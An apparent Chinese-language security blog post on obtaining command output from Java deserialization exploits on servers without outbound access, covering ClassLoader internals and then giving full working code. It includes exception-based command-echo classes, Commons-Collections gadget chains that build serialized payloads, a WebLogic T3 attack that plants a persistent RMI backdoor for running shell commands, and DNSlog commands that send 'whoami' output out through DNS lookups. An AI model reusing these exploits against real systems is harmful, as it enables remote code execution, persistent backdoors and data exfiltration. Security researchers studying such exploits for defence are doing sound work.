java序列回显学习

java反序列化回显

在很多不出网的情况下,一种是写webshell(内存嘛),另一种就是回显,本文先学习回显,回显的主要方式有一下几种。

  1. defineClass
  2. RMI绑定实例
  3. URLClassLoader抛出异常
  4. 中间件
  5. 写文件css、js
  6. dnslog

前面有多多少了解过ClassLoader本篇花费一节仔细学习一下

1、前置知识

classloader顾名思义,即是类加载。虚拟机把描述类的数据从class字节码文件加载到内存,并对数据进行检验、转换解析和初始化,最终形成可以被虚拟机直接使用的Java类型,这就是虚拟机的类加载机

1.1、ClassLoader加载过程

主要是三个阶段

第一个阶段是加载,把.class文件加载到内存,并为它创建一个java.lang.Class对象

第二个阶段是连接,连接包括三阶段

验证:确保加载的类信息符合JVM规范,无安全方面的问题。

准备:为类的静态Field分配内存,并设置初始值,变量的初始值,如:int=0。

解析:将类的二进制数据中的符号引用替换成直接引用。

第三阶段是初始化

1、优先对该类的父类进行初始化,然后对static修饰的变量和代码块进行初始化

img

1.2、classloader双亲委托机制

当一个类加载的过程中,它首先不会去加载,而是委托给自己的父类去加载,父类又委托给自己的父类。因此所有的类加载都会委托给顶层的父类,即Bootstrap Classloader进行加载,然后父类自己无法完成这个加载请求,子加载器才会尝试自己去加载

img

1.启动类加载器(Bootstrap Classloader)负责将<JAVA_HOME>/lib目录下并且被虚拟机识别的类库加载到虚拟机内存中。我们常用基础库,例如java.util.,java.io.,java.lang.**等等都是由根加载器加载

2.扩展类加载器(Extention Classloader)负责加载JVM扩展类,比如swing系列、内置的js引擎、xml解析器等,这些类库以javax开头,它们的jar包位于<JAVA_HOME>/lib/ext目录中

3.应用程序加载器(Application Classloader)也叫系统类加载器,它负责加载用户路径(ClassPath)上所指定的类库。我们自己编写的代码以及使用的第三方的jar包都是由它来加载的

4.自定义加载器(Custom Classloader)通常是我们为了某些特殊目的实现的自定义加载器

1.3、ClassLoader类 核心方法

1.loadClass(String className),根据名字加载一个类。
2.defineClass(String name, byte[] b, int off, int len),将一个字节流定义为一个类。
3.findClass(String name),查找一个类。
4.findLoadedClass(String name),在已加载的类中,查找一个类。

1.4、自定义Classloader

当加载一个类时,会首先从已经加载的类里面去查找这个类。如果类未加载,且如果父加载器不为空,则调用父加载器的loadClass方法进行加载,如果父加载器为空,则调用BootStrap class loader加载。如果依然没有加载到类,则调用findClass方法。而findClass方法是需要子类重写的。所以我们只需要继承classLoader重写findClass方法就可以实现自定义ClassLoader

1、继承classLoader
2、重写findClass()方法
3、在findClass()中调用defineClass

编写测试类

package com.akkacloud.demo;

import java.io.*;
import java.util.Arrays;

public class test {
    public void testclassloder() {
        System.out.println("test classloader");
    }


}

编译成class文件

image-20220414222045762

编写自己的classLoder

package com.akkacloud.demo;

import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class myClassloader extends ClassLoader{

    private static String ClassName = "com.akkacloud.demo.test";
    //获取class文件,转换成byte
    private static byte[] getbyte() throws IOException {
        InputStream is = new FileInputStream(new File("/Users/akka/Downloads/deserialzeEcho/src/main/java/com/akkacloud/demo/test.class"));
        ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
        byte[] bytes = new byte[1024];
        int temp;
        while ((temp = is.read(bytes)) != -1) {
            outputStream.write(bytes, 0, temp);
        }
        //转换后的byte[]
        byte[] finalBytes = outputStream.toByteArray();
        return finalBytes;

    }

    @Override
    protected Class<?> findClass(String name) throws ClassNotFoundException {

        //如果类名为我们定的类
        if(name==ClassName){
            try {
                //从字节中获取一个类
                return defineClass(ClassName, getbyte(),0,getbyte().length);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
        return super.findClass(name);
    }

    public static void main(String[] args) throws ClassNotFoundException {
       //新建自定义的类加载器
        myClassloader myClassloader = new myClassloader();
        Class<?> aClass = myClassloader.loadClass(ClassName);
        try {
            //反射调用类的方法
            Object o = aClass.newInstance();
            Method declaredMethod = aClass.getMethod("testclassloder", null);
            declaredMethod.invoke(o, null);
        } catch (InstantiationException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        } catch (NoSuchMethodException e) {
            e.printStackTrace();
        } catch (InvocationTargetException e) {
            e.printStackTrace();
        }


    }
}

2、defineClass异常回显

首先新建恶意异常回显类,并且编译成class文件

package com.akkacloud.demo;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Echo {
    public Echo(String cmd) throws Exception {
        ProcessBuilder processBuilder = new ProcessBuilder(new String[]{cmd});
        Process start = processBuilder.start();
        InputStream inputStream = start.getInputStream();
        InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
        BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
        StringBuffer stringBuffer = new StringBuffer();

        String line =null;
        while ((line = bufferedReader.readLine()) != null) {
            stringBuffer.append(line).append("\n");
        }
        throw new Exception(stringBuffer.toString());

    }
}

新建自己的classLoder

package com.akkacloud.demo;

import java.io.*;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

public class myClassloader extends ClassLoader{

    private static String ClassName = "com.akkacloud.demo.Echo";
    //获取class文件,转换成byte
    private static byte[] getbyte() throws IOException {
        InputStream is = new FileInputStream(new File("/Users/akka/Downloads/deserialzeEcho/src/main/java/com/akkacloud/demo/Echo.class"));
        ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
        byte[] bytes = new byte[1024];
        int temp;
        while ((temp = is.read(bytes)) != -1) {
            outputStream.write(bytes, 0, temp);
        }
        //转换后的byte[]
        byte[] finalBytes = outputStream.toByteArray();
        return finalBytes;

    }

    @Override
    protected Class<?> findClass(String name) throws ClassNotFoundException {

        //如果类名为我们定的类
        if(name==ClassName){
            try {
                //从字节中获取一个类
                return defineClass(ClassName, getbyte(),0,getbyte().length);
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
        return super.findClass(name);
    }

    public static void main(String[] args) {
       //新建自定义的类加载器
        myClassloader myClassloader = new myClassloader();
            //反射调用类的方法
        try {
            Class<?> aClass = myClassloader.loadClass(ClassName);
            Object o = aClass.getConstructor(String.class).newInstance("id");

        } catch (InstantiationException e) {
            e.printStackTrace();
        } catch (IllegalAccessException e) {
            e.printStackTrace();
        } catch (InvocationTargetException e) {
            e.printStackTrace();
        } catch (NoSuchMethodException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {
            e.printStackTrace();
        }


    }
}

image-20220414231017365

3、URLClassLoader异常回显

通过将回显结果封装到异常信息抛出拿到回显。

异常回显类

package com.akkacloud.demo;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Echo {
    public Echo(String cmd) throws Exception {
        ProcessBuilder processBuilder = new ProcessBuilder(new String[]{cmd});
        Process start = processBuilder.start();
        InputStream inputStream = start.getInputStream();
        InputStreamReader inputStreamReader = new InputStreamReader(inputStream);
        BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
        StringBuffer stringBuffer = new StringBuffer();

        String line =null;
        while ((line = bufferedReader.readLine()) != null) {
            stringBuffer.append(line).append("\n");
        }
        throw new Exception(stringBuffer.toString());

    }
}

打jar包

javac Echo.java
jar -cvf Echo.jar Echo.class

image-20220414231446718

使用URLClassLoader加载jar获得回显

package com.akkacloud.demo;

import java.lang.reflect.InvocationTargetException;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;

public class myURLClassLoader {
    public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException {
        URL url = new URL("http://localhost:8000/Echo.jar");
        URL[] urls = {url};
        URLClassLoader urlClassLoader = URLClassLoader.newInstance(urls);
        Object o = urlClassLoader.loadClass("com.akkacloud.demo.Echo").getConstructor(String.class).newInstance("id");

    }
}

image-20220414232326218

4、改造cc链

把上面的代码换成反射执行先

package com.akkacloud.demo;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;

public class myURLClassLoader {
    public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, NoSuchFieldException {
/*        URL url = new URL("http://localhost:8000/Echo.jar");
        URL[] urls = {url};
        URL[] urls= new URL[]{ new URL("http://localhost:8000/Echo.jar")};
        */


/*
        URLClassLoader urlClassLoader = URLClassLoader.newInstance(new URL[]{ new URL("http://localhost:8000/Echo.jar")});
         Object o = urlClassLoader.loadClass("com.akkacloud.demo.Echo").getConstructor(String.class).newInstance("id");

*/



        Method getConstructorMethod = URLClassLoader.class.getClass().getMethod("getConstructor", new Class[]{Class[].class});
        //new Object[]{}是invoke的参数类型要求,new Class[]{}是getConstructor的参数类型,URL[].class是具体调用newInstance需要传入url数组
        Object getConstructor = getConstructorMethod.invoke(URLClassLoader.class, new Object[]{new Class[]{URL[].class}});
        System.out.println(getConstructor);

        Method newInstanceMethod = getConstructor.getClass().getMethod("newInstance", new Class[]{Object[].class});
        URLClassLoader urlClassLoader = (URLClassLoader) newInstanceMethod.invoke(getConstructor, new Object[]{new Object[]{new URL[]{new URL("http://127.0.0.1:8000/ProcessExec.jar")}}});
        System.out.println(urlClassLoader);


        Class aClass = urlClassLoader.getClass();
        Method loadClassMethod = aClass.getMethod("loadClass", new Class[]{String.class});
        Object Echo = loadClassMethod.invoke(urlClassLoader, new Object[]{"com.akkacloud.demo.Echo"});
        System.out.println(Echo);

        Method getEchoConstructor = Echo.getClass().getMethod("getConstructor", new Class[]{Class[].class});
        Object EchoConstrutor = getEchoConstructor.invoke(Echo, new Object[]{new Class[]{String.class}});
        System.out.println(EchoConstrutor);


        Method EchonewInstance = EchoConstrutor.getClass().getMethod("newInstance", new Class[]{Object[].class});
        EchonewInstance.invoke(EchoConstrutor, new Object[]{new String[]{"id"}});


        }

}

image-20220415192130932

改造cc

package com.akkacloud.demo;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;

public class myURLClassLoader {
    public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, NoSuchFieldException {

        ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
                    new ConstantTransformer(URLClassLoader.class),
                    new InvokerTransformer("getConstructor",
                            new Class[]{Class[].class},
                            new Object[]{new Class[]{URL[].class}}),
                    new InvokerTransformer("newInstance",
                            new Class[]{Object[].class},
                            new Object[]{new Object[]{new URL[]{new URL("http://127.0.0.1:8000/Echo.jar")}}}),

                    new InvokerTransformer("loadClass",
                            new Class[]{String.class},
                            new Object[]{"com.akkacloud.demo.Echo"}),

                    new InvokerTransformer("getConstructor",
                            new Class[]{Class[].class},
                            new Object[]{new Class[]{String.class}}),
                    new InvokerTransformer("newInstance",
                            new Class[]{Object[].class},
                            new Object[]{new String[]{"id"}})


            });

            HashMap innermap = new HashMap();
            LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);
            TiedMapEntry tiedmap = new TiedMapEntry(map,123);
            BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
            Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
            val.setAccessible(true);
            val.set(poc,tiedmap);

            try{
                ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc5"));
                outputStream.writeObject(poc);
                outputStream.close();

                ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc5"));
                inputStream.readObject();
            }catch(Exception e){
                e.printStackTrace();
            }
        }

}

5、绑定RMI实例回显

1、编写接口类

package com.akkacloud.rmi;

import java.io.IOException;
import java.rmi.Remote;

public interface Echo extends Remote {
    public String Echo(String cmd) throws IOException;
}

2、编写接口实现类,重写Echo方法,传入恶意代码

package com.akkacloud.rmi;

import java.io.IOException;
import java.io.InputStream;
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;
import java.util.Scanner;

public class EchoImpl extends UnicastRemoteObject implements Echo {
    protected EchoImpl() throws RemoteException {
        super();
    }

    @Override
    public String Echo(String cmd) throws IOException {
        InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
        Scanner scanner = new Scanner(inputStream).useDelimiter("\\a");
        String s = scanner.hasNext() ? scanner.next() : "";
        System.out.println("123");
        return s;
    }
}

3、编写Rmi服务端

package com.akkacloud.rmi;

import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer {
    public static void main(String[] args) throws RemoteException, AlreadyBoundException {
        EchoImpl echo = new EchoImpl();
        System.out.println(echo);
        Registry registry = LocateRegistry.createRegistry(1234);
        registry.bind("Echo",echo );
        System.out.println("rmiserver is running");
    }
}

4、编写客户端

package com.akkacloud.rmi;

import java.io.IOException;
import java.rmi.NotBoundException;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiClient {
    public static void main(String[] args) throws IOException, NotBoundException {

        Registry registry = LocateRegistry.getRegistry("localhost", 1234);
        Echo echo = (Echo)registry.lookup("Echo");
        System.out.println(echo);
        System.out.println(echo.Echo("id"));

    }
}

服务端总体流程

1、编写接口继承Remote

2、编写接口的Echo方法抛出java.rmi.RemoteException 异常

3、编写接口实现类EchoImpl,

4、重写Echo方法

5、新建接口实现类并且绑定在注册中心

客户端总体流程

1、查找注册中心的对应方法

2、调用该方法

这里大佬在有个思路,通过common-collection反序列化调用ClassLoader,通过字节码来自定义一个RMI接口类,在类实现的方法中返回命令执行的结果,其实就是打入一个rmi的后门,然后进行调用该后门进行执行命令,并且回显。但是还有几个问题

  1. defineClass需要ClassLoader的子类才能拿到

    定义了defineClass

    image-20220421110106970

    image-20220421110732549

    org.mozilla.classfile.DefiningClassLoader#defineClass
    
  2. 具体应该实现哪个RMI接口类呢?

    返回为String类型且继承了Remote并且抛出java.rmi.RemoteException

    image-20220421110931910

  3. common-collection构造的问题

// common-collection1 构造transformers 定义自己的RMI接口
Transformer[] transformers = new Transformer[]{
    new ConstantTransformer(DefiningClassLoader.class),
    new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}),
    new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}),
    new InvokerTransformer("defineClass",
                           new Class[]{String.class, byte[].class}, new Object[]{className, clsData}),
    new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"main", new Class[]{String[].class}}),
    new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{}}),
    new ConstantTransformer(new HashSet())};

idea导入weblogic的包,modules和wlserver_10.3/server下的lib包。然后导入https://github.com/5up3rc/weblogic_cmd该项目。

首先先写回显类既Remote实现类

package com.supeream;

import weblogic.cluster.singleton.ClusterMasterRemote;

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.io.BufferedReader;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.rmi.RemoteException;
import java.util.ArrayList;
import java.util.List;

public class RemoteImpl implements ClusterMasterRemote {

    public static void main(String[] args) {
        RemoteImpl remote = new RemoteImpl();
        try {
            Context context = new InitialContext();
            context.rebind("echo",remote);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }


    @Override
    public void setServerLocation(String cmd, String args) throws RemoteException {

    }


    @Override
    public String getServerLocation(String cmd) throws RemoteException {
        try {
            if (cmd.equals("unbind")) {
                Context ctx = new InitialContext();
                ctx.unbind("echo");
                return null;
            } else{
                String name = System.getProperty("os.name");
                String[] cmds = name != null && name.toLowerCase().contains("win") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"sh", "-c", cmd};
                InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                byte[] buf = new byte[1024];
                int len = 0;
                ByteArrayOutputStream out = new ByteArrayOutputStream();
                while ((len = in.read(buf)) != -1) {
                    out.write(buf, 0, len);
                }
                return new String(out.toByteArray());
            }
        } catch (Exception e) {
            return e.getMessage();
        }
    }
}

工具类

package com.supeream;

import java.io.*;
import java.util.Arrays;

public class Tobyte {
    public static byte[] getbyte(String path) throws IOException {

        InputStream in = new FileInputStream(path);
        byte[] classBytes;
        classBytes = new byte[in.available()];
        in.read(classBytes);
        in.close();
        return classBytes;
    }


    public static void main(String[] args) throws IOException {
        byte[] getbyte = Tobyte.getbyte("/Users/akka/Desktop/RemoteImpl.class");
        System.out.println(Arrays.toString(getbyte));
    }
}

rmi客户端类

package com.supeream;

import com.supeream.serial.Reflections;
import com.supeream.serial.SerialDataGenerator;
import com.supeream.serial.Serializables;
import com.supeream.ssl.WeblogicTrustManager;
import com.supeream.weblogic.T3ProtocolOperation;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.mozilla.classfile.DefiningClassLoader;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.corba.utils.MarshalledObject;
import weblogic.jndi.Environment;

import javax.naming.Context;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

public class test {
    private static String host = "172.20.10.4";
    private static String port = "7001";
    private static final String classname = "com.supeream.RemoteImpl";

    private static  byte[] bs ;

    public static void main(String[] args) {
        try {
            String url = "t3://" + host + ":" + port;
            // 安装RMI实例
            bs=Tobyte.getbyte("/Users/akka/Desktop/RemoteImpl.class");
            invokeRMI(classname, bs);

            Environment environment = new Environment();
            environment.setProviderUrl(url);
            environment.setEnableServerAffinity(false);
            environment.setSSLClientTrustManager(new WeblogicTrustManager());
            Context context = environment.getInitialContext();
            ClusterMasterRemote remote = (ClusterMasterRemote) context.lookup("echo");

            // 调用RMI实例执行命令
            String res = remote.getServerLocation("ipconfig");
            System.out.println(res);
        } catch (Exception e) {
            e.printStackTrace();
        }

    }

    private static void invokeRMI(String className, byte[] clsData) throws Exception {
        // common-collection1 构造transformers 定义自己的RMI接口
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(DefiningClassLoader.class),
                new InvokerTransformer("getDeclaredConstructor", new Class[]{Class[].class}, new Object[]{new Class[0]}),
                new InvokerTransformer("newInstance", new Class[]{Object[].class}, new Object[]{new Object[0]}),
                new InvokerTransformer("defineClass",
                        new Class[]{String.class, byte[].class}, new Object[]{className, clsData}),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"main", new Class[]{String[].class}}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{null}}),
                new ConstantTransformer(new HashSet())};

        final Transformer transformerChain = new ChainedTransformer(transformers);
        final Map innerMap = new HashMap();

        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);

        InvocationHandler handler = (InvocationHandler) Reflections
                .getFirstCtor(
                        "sun.reflect.annotation.AnnotationInvocationHandler")
                .newInstance(Override.class, lazyMap);

        final Map mapProxy = Map.class
                .cast(Proxy.newProxyInstance(SerialDataGenerator.class.getClassLoader(),
                        new Class[]{Map.class}, handler));

        handler = (InvocationHandler) Reflections.getFirstCtor(
                "sun.reflect.annotation.AnnotationInvocationHandler")
                .newInstance(Override.class, mapProxy);

        // 序列化数据 MarshalledObject绕过
        Object obj = new MarshalledObject(handler);
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(obj);
        objOut.flush();
        objOut.close();
        byte[] payload = out.toByteArray();
        // t3发送
        T3ProtocolOperation.send(host, port, payload);
    }
}

如T3ProtocolOperation报错,需要修改两处

image-20220421105128977

SocketFactory类

image-20220421105139005

最后成功了

image-20220421105515133

6、中间件回显

中间件回显我们另开篇章学习

7、写文件、dnslog

这两种都比较简单,写文件主要是搜索一些特殊的静态文件,然后将结果写入文件,dnslog如下

dnslog

//windows
ping %OS%.ijowns.dnslog.cn
//linux
ping -c 1 `whoami`.niddp9.dnslog.cn
变量                                           类型       描述
%USERNAME%                                     返回当前登录的用户的名称。
%USERDOMAIN%                                   返回包含用户帐户的域的名称。
%OS%                                           返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。
%USERPROFILE%                                  返回当前用户的配置文件的位置。
%ALLUSERSPROFILE%                           返回“所有用户”配置文件的位置。
%APPDATA%                                 返回默认情况下应用程序存储数据的位置。
%CD%                                       返回当前目录字符串。
%CMDCMDLINE%                                    返回用来启动当前的 Cmd.exe 的准确命令行。
%CMDEXTVERSION%                              返回当前的“命令处理程序扩展”的版本号。
%COMPUTERNAME%                                返回计算机的名称。
%COMSPEC%                                            返回命令行解释器可执行程序的准确路径。
%DATE%                                                  返回当前日期。
%ERRORLEVEL%                                  返回上一条命令的错误代码。通常用非零值表示错误。
%HOMEDRIVE%                                           返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
%HOMEPATH%                                             返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
%HOMESHARE%                                           返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。
%LOGONSERVER%                                      返回验证当前登录会话的域控制器的名称。
%NUMBER_OF_PROCESSORS%                 指定安装在计算机上的处理器的数目。
%PATH%                                          指定可执行文件的搜索路径。
%PATHEXT%                                                 返回操作系统认为可执行的文件扩展名的列表。
%PROCESSOR_ARCHITECTURE%              返回处理器的芯片体系结构。值:x86 或 IA64(基于 Itanium)。
%PROCESSOR_IDENTFIER%                    返回处理器说明。
%PROCESSOR_LEVEL%                            返回计算机上安装的处理器的型号。
%PROCESSOR_REVISION%                       返回处理器的版本号。
%PROMPT%                                           返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。
%RANDOM%                                          返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。
%SYSTEMDRIVE%                                  返回 Windows server operating system 根目录的位置。
%TEMP%和%TMP%                                 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP,而其他应用程序则需要 TMP。
%TIME%                                         返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息,请参阅 Time。
%WINDIR%                                       返回操作系统目录的位置

8、结束

在rmi绑定回显最后测试卡了很久,最后还是请教了y4er师傅,反写师傅的指导,总结一句就是不够细心、不够细心、不够细心。

参考

https://y4er.com/post/weblogic-uses-classloader-and-rmi-to-display-command-execution-results/

https://github.com/5up3rc/weblogic_cmd/